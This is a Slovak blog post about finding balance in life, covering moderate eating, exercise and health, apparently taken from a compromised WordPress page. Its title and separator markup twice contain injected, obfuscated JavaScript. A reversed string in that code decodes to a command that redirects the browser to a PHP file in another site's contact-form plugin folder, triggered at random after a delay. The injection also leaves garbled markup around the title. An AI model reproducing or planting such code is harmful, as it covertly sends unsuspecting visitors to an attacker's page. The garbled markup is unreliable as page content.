<“h1″ class="w-post-elm post_title us_custom_f5286e8b entry-title" itemprop="headline">Ako nájsť v živote rovnováhu) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%220.5rem%22%2C%22font-family%22%3A%22h1%22%7D%7D“]
Nekomentované
[us_separator size=“small“]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%221.5rem%22%7D%7D“]

Kladiete si otázku ako nájsť skutočnú rovnováhu v uponáhľanom svete? Každý deň máme „na pleciach“ množstvo aktivít, činností, radostí, povinností, ktoré prežívame a vykonávame. Ako nájsť rovnováhu a rozdeliť energiu v správnej miere? Vnímať kedy je toho priveľa, kedy už zmierniť, zastaviť sa a prípadne s pokorou prijať menej. Áno, menej je niekedy viac! Staré dobré múdre príslovie 🙂 Je nesmierne dôležité nájsť si správnu rovnováhu v každom aspekte života, aby sme dokázali žiť v skutočnej radosti. Poďme sa pozrieť, ako sa to dá urobiť…

 

Žijeme v čase, keď je všetkého dostatok. Vlastníme mnoho vecí, všetko sa dá kúpiť, zažiť, prečítať, naučiť, ochutnať. Zároveň je to rýchla doba, vysoké nároky, pracovné nasadenie a očakávania. Treba sa ale naučiť využiť jednotlivé vnemy len do takej miery, ktorá nás podporuje. Ak sa zameriame len na pracovnú oblasť, pracovné vzťahy a neustále plnenie pracovných úloh, dostaneme sa do extrému, kde nedokážeme už zažiť a prijímať iné vnemy, oblasti života. Každý extrém prináša nevyrovnanosť. A to ústi do pocitov nervozity, strachu, neistoty, dokonca až podceňovania seba a svojich schopností. Krásny názorný príklad je v oblasti stravy. Koľko skutočne potrebujete zjesť, aby váš organizmus dostal správnu výživu a energiu? Ak budete jesť stále viac a viac, nezískate viac energie, ani pôžitku. Len si priženiete množstvo problémov fyzických aj psychických. Lebo žiaden extrém nás nepodporuje!

Ďalší krásny príklad s oblečením. Ak by ste mali jediné šaty na celý rok asi by to skutočne nestačilo, aby ste  mohli v kľude fungovať. Opačný extrém, prehnane preplnené skrine však tiež nepodporí vašu spokojnosť. V každej oblasti si vieme nájsť mieru, ktorá je v poriadku, aby nás podporovala, necítili sme nedostatok alebo prehnaný nadbytok.

 

Áno, potrebujeme pestrosť, rôznorodosť a naplnené všetky zmysly, vnemy, pocity. Všetky oblasti života potrebujeme vyživovať. A jedným dychom dodávam, že máme aj možnosť výberu. A práve správny výber, striedmy v každej oblasti, je kľúčový, aby sme mohli žiť v rovnováhe a byť vnútorne spokojní. Naplnení, a spokojní.

 

V sérii článkov sa zameriame na jednotlivé oblasti života a rozoberieme bližšie ako by mohla vyzerať správna vyživujúca miera. A dnes začneme fyzickou oblasťou. Čo a do akej miery potrebuje naše fyzické telo, aby sme mohli veselo fungovať 🙂

  1. Vyvážená zdravá strava

Nie je tajomstvom, že jesť treba zdravo a najmä striedmo. Veľa krát počujem výrok: “Naši starí rodičia vyrástli na slanine a klobáse a nič im nebolo, tak si môžem vkľude dopriať aj ja!” Je ale rozdiel, čo všetko ďalšie naši starí rodičia fyzicky vykonávali, a ku akému množstvu ďalšieho jedla sa dostali. Kľúčom k úspechu je stanoviť si pravidelný čas a dopriať si pestré jedlo 3x denne do takej miery, že pocítime plnosť asi na 80%. Ak sa totiž najeme príliš, naše telo nedokáže lepšie fungovať. Práve naopak, trápi sa s procesom trávenia a my nie sme schopní ani rozmýšľať, ani sa poriadne hýbať, a ani to jedlo oceniť. Pretože náš konečný pocit z najedenia je nepríjemný. Ďalším nesmierne dôležitým pravidlom je nejesť pomedzi naše hlavné jedlá. Často siahame po rýchlej energii alebo len takej maškrte kedykoľvek počas dňa. To neprospieva ani vášmu fyzickému organizmu, ale ani vám. Skúste sa len tak so zvedavosti zamyslieť: Čo skutočne hľadáte a chcete vyživiť v tom momentne keď zvedavo skúmate v špajzi či chladničke? Hľadáte moment pokoja? Trochu lásky pre seba?

 

  • Správna miera pohybu

 

Naše telo je stvorené pre pohyb. Potrebuje sa hýbať každý deň, aby dokázalo držať pokope a zvládať všetky naše aktivity v zdraví. Aký pohyb je vám najbližší? Je dôležité nespadnúť do extrému ani primálo (respektíve žiaden) pohyb a ani extrémne veľa. Nie je dôležité doslova odmakať minimálne hodinový drsný tréning ani venovať každú voľnú chvíľu cvičeniu! Vyživiť predsa potrebujeme rovnovážne viaceré oblasti, viacerými podnetmi. Dôležité je dopriať telu, čo potrebuje a užívať si to. Dopriať si ten príjemný pocit, keď sa vyplavia endorfíny a vy máte zrazu úsmev na tvári. Skúste vnímať vlastné telo a ono vás samé naučí, kde je tá vaša správna rovnováha. A aj vy sa budete cítiť skvele vo svojom tele!

 

  • Zdravie

 

Významná časť nášho života, lebo bez zdravia môžme na ostatné veci skutočne zabudnúť. Podporujte svoje telo, aby dostalo všetko čo potrebuje. Čo to znamená? Dostatočný kvalitný spánok – ale nie vyspávanie celé doobedie. Vyvážená strava s dostatkom vitamínov a živín – ale nie prehnané dopĺňanie každého vitamínu tabletkami a stresujúce rátanie kalórií. Aj pohyb ako píšem v bodoch vyššie. A samozrejme starostlivosť, nevystavovať sa nebezpečným situáciám, ktoré bezprostredne ohrozujú vaše zdravie. Ale ani prehnané pozorovanie a precitlivenosť na každú boliestku či vypadnutý vlas.

 

Verím, že sa nastavíte na správnu mieru a teším sa s vami na ďalšiu časť, kde sa pozrieme na pracovnú a sociálnu oblasť života.

Menu